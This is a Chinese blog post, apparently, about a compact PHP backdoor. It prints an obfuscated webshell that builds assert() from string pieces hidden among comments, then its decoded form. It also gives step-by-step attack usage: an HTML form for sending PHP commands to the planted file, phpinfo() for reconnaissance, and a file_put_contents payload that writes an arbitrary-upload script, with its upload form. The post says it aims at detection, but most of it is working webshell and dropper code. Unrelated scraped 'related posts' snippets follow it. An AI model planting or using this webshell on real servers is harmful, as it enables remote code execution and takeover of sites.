本文将介绍一个代码很简短,而且很隐蔽的后门木马,以便让大家在检测程序时可以避免被挂木马。

文件内容如下:

<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

代码中插入了很多注释符,服务器的检测程序如果不严谨很难检测到。

把注释符删除后,代码如下:

<?php
@$_="s"."s"."e"."r";
@$_="a".$_."t";
@$_(${"_P"."OS"."T"}
[0-2-5]);
?>

最后实际执行的代码内容为:

<?php
assert(${"_POST"}[-7]);
?>

原来这个后门是利用了php assert方法来执行程序。

bool assert ( mixed $assertion [, string $description ] )

assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。

如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

如果$assertion的内容为phpinfo(); 则会把服务器的信息返回,使攻击者能获取到服务器信息对此攻击。

上传了这个后门程序后,攻击者只需要创建一个简单的html就可以在服务器中执行php语句。
假设后门文件是backdoor.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title> back door </title></head><body><form name="form1" method="post" action="http://www.example.com/backdoor.php"><p><textarea name="-7" style="width:500px; height:300px"></textarea></p><p><input type="submit" value="submit"></p></form></body>
</html>

攻击方式:
1.获取服务器信息可输入

phpinfo();

2.创建一个可随便上传文件的php可输入

file_put_contents('hack.php', '<?php move_uploaded_file($_FILES[\'name\'][\'tmp_name\'], dirname(__FILE__).\'/dest.php\');?>' ,true);

然后创建一个上传文件的html调用hack.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title> upload </title></head><body><form name="form1" method="post" action="http://www.example.com/hack.php" enctype="multipart/form-data"><p><input type="file" name="name"></p><p><input type="submit" value="submit"></p></form></body>
</html>

之后便可随意上传php文件执行了。

代码简短且隐蔽的后门木马相关推荐

  1. 寻找绝对隐蔽的后门的办法 分享

    nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都 丢了,于是想寻找一个超级隐蔽的后门方法.无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索includ ...

  2. php 木马 加密,PHP后门木马详解

    说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考. php后门木马对大家来说一点都不陌生 ...

  3. mysql定时木马_Mysql的语句生成后门木马的方法

    咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...

  4. php后门木马常用命令

    2019独角兽企业重金招聘Python工程师标准>>> php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢? php后门木马常用的函数大致上可分为四种类型: 1. 执行 ...

  5. 【网络蠕虫】恶意代码之计算机病毒、网络蠕虫、木马

    [网络蠕虫]恶意代码之计算机病毒.网络蠕虫.木马 下表内容还未完善 计算机病毒 网络蠕虫 木马 定义 是一段程序 是一段程序 特点(差异) 传播必须要人为参与 寄生于另一段程序或文件 自我复制并大规模 ...

  6. php命令执行后门,php后门木马常用命令

    php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢? php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, e ...

  7. mysql 木马_用Mysql语句来生成后门木马方案

    下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案. ...

  8. 网站后门木马怎么清理

    收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现 ...

  9. .net 本地文件管理 代码_如何在百万行代码中发现隐藏的后门

    试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的. 即使是一款拥有99.9%的Webs ...

最新文章

  1. DNN、RNN、CNN.…..一文带你读懂这些绕晕人的名词
  2. 人工智能浪潮正席卷全球
  3. QTableview 获取鼠标坐标的item(QModelIndex)
  4. 线程池的几个重要参数?—— 七大参数
  5. Catlike Coding网站文章解析 -- 2.Procedural Grid
  6. 人员雇佣 网络流_雇用Java EE开发人员的一些面试问题
  7. Java中如何使用非阻塞异步编程——CompletableFuture
  8. 挫败帆船行业调研报告 - 市场现状分析与发展前景预测(2021-2027年)
  9. X86Windows 相关链接....持续更新中....
  10. 10个新晋潮语,测你潮不潮!
  11. 解决PowerDesigner 错误:Invalid repository user or password!
  12. 信息安全工程师第二版教材主要章节内容
  13. DeferredShading
  14. 计算机的扩展模式,Win7双屏复制/双屏扩展设置教程
  15. 创意、实现和合作:一次原创H5的尝试
  16. elasticsearch操作
  17. 通达信公式改写成python代码的最简实现方式
  18. 深挖阿里健康财报中的隐藏剧情:慢病管理布局已成?
  19. Harry Potter and the Half-Blood Prince
  20. Win10 将D盘多余空间分配给C盘

热门文章

  1. Word文档中实现:点击图片双击放大
  2. MySql安装与使用
  3. AJAX-客户端服务器端通信
  4. 计算机的CPU的电路是多少KW,你的电脑多少瓦? 最全面的CPU功耗测试
  5. java jdom 类_JDOM常用类介绍及示例代码
  6. chrom浏览器模拟手机访问
  7. 从Folly源代码中学习C ++ 11的新功能。
  8. 【融职培训】Web前端学习 第3章 JavaScript基础教程9 内置对象
  9. 阿里为什么总mysql_为什么部署在阿里云上 MySQL 老是因为内存而挂掉,不是个例....
  10. java ifpresent_java – 正确使用Optional.ifPresent()